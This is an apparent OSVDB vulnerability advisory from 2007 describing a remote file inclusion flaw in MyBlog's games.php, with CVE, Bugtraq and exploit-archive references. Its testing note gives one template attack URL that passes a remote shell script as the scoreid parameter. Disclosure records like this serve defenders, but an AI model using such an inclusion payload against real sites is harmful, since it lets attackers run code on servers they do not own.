MyBlog games.php scoreid Variable Remote File Inclusion

2007-04-04T09:06:46
ID OSVDB:35263
Type osvdb
Reporter OSVDB
Modified 2007-04-04T09:06:46

Description

Manual Testing Notes

http://[target]/[path]/games.php?scoreid=[Sh3ll-Script]

References:

Vendor URL: http://sourceforge.net/projects/myblog/ Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0084.html Mail List Post: http://attrition.org/pipermail/vim/2007-April/001503.html Generic Exploit URL: http://www.milw0rm.com/exploits/3685 FrSIRT Advisory: ADV-2007-1302 CVE-2007-1968 Bugtraq ID: 23311